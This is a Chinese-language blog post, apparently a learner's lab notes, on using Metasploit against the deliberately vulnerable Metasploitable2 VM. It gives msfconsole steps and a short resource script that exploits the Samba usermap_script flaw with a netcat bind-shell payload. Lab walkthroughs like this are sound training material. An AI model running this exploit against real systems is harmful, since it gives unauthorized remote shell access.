最近想找一个渗透测试的项目做,因此想学习一下metasploit的使用。
metasploit是一个强大的渗透测试工具,受到广大安全爱好者的喜欢。
接下来,我将记录下--我根据<<Metasploit渗透测试魔鬼训练营>>这本书,学习和使用metasploit进行渗透测试的过程。
对metasploitable2渗透测试
1.先去官网下载metasploitable2镜像,将其部署在vmware虚拟机上面,并启动。默认的登录账户和密码都是msfadmin
2.启动kali虚拟机,在终端下输入msfconsole就可以启动msf终端了
3.使用samba漏洞对metasploitable2的测试流程:
启动&查找(search) Samba漏洞的exploit
Paste_Image.png
use exploit& show payloads
Paste_Image.png
set payload & show options & set RHOST
im
最后输入exploit就会执行之前设置好的exploit,之后利用成功之后会显示生成一个shell,就可以执行命令了
(注:跟一般的终端不一样,没有前缀,想看是否利用成功,可以输入命令试试看是否返回结果,我输入的ls -l)
Paste_Image.png
tips:
1.输入umane -a可以查看机器的系统信息。
那么,怎么实现一个自动化的脚本来利用msf去渗透呢?可以这么做
- 先查看一些msfconsole的帮助命令:
Paste_Image.png
- 发现可以用msfconsole -r file来执行一个脚本,因此先创建一个文件hello.msf,内容为
use multi/samba/usermap_script
set payload cmd/unix/bind_netcat
set RHOST 192.168.150.132
exploit
- 然后输入
msfconsole -r hello.msf,执行成功后如下图:
Paste_Image.png
Paste_Image.png
网友评论